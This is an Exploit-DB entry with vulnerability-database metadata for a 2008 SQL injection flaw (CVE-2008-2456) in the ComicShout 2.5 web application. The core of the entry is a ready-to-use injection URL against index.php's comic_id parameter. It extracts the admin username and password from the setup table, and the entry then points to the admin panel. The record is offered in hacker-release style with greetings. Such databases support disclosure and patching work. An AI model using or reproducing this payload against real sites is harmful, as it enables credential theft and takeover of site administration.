ID EDB-ID:5658
Type exploitdb
Reporter Niiub
Modified 2008-05-20T00:00:00
Description
ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability. CVE-2008-2456. Webapps exploit for php platform
##########################################################
#
# ComicShout Remote 2.5 SQL Injection Vulnerability
#
# by D3m0n a.k.a Niiub
#
# Home: www.bl4ck-b0x-info
#
# niiub[at]bl4ck-b0x.info
#
##########################################################
##########################################################
Exploit:
/index.php?comic_id=-1+UNION+SELECT+1,2,3,concat(site_admin,char(58),site_pass),5,6+FROM+setup/*
Admin PA:
admin.php
###########################################################
Greetz: dun - sid_psycho - Kacper
###########################################################
# milw0rm.com [2008-05-20]
{"id": "EDB-ID:5658", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ComicShout 2.5 index.php comic_id Remote SQL Injection Vulnerability", "description": "ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability. CVE-2008-2456. Webapps exploit for php platform", "published": "2008-05-20T00:00:00", "modified": "2008-05-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5658/", "reporter": "Niiub", "references": [], "cvelist": ["CVE-2008-2456"], "lastseen": "2016-01-31T23:24:13", "viewCount": 6, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T23:24:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2456"]}], "modified": "2016-01-31T23:24:13", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/5658/", "sourceData": "##########################################################\n#\n#\tComicShout Remote 2.5 SQL Injection Vulnerability\n#\n#\tby D3m0n a.k.a Niiub\n#\n#\tHome: www.bl4ck-b0x-info\n#\n#\tniiub[at]bl4ck-b0x.info\n#\n##########################################################\n\n\n##########################################################\n\nExploit:\n\n/index.php?comic_id=-1+UNION+SELECT+1,2,3,concat(site_admin,char(58),site_pass),5,6+FROM+setup/*\n\n\nAdmin PA:\n\nadmin.php\n\n###########################################################\n\nGreetz: dun - sid_psycho - Kacper\n\n###########################################################\n\n# milw0rm.com [2008-05-20]\n", "osvdbidlist": ["45406"]}
{"cve": [{"lastseen": "2020-12-09T19:28:23", "description": "SQL injection vulnerability in index.php in ComicShout 2.5 and earlier allows remote attackers to execute arbitrary SQL commands via the comic_id parameter.", "edition": 5, "cvss3": {}, "published": "2008-05-27T14:32:00", "title": "CVE-2008-2456", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2456"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:comicshout:comicshout:2.5"], "id": "CVE-2008-2456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:comicshout:comicshout:2.5:*:*:*:*:*:*:*"]}]}
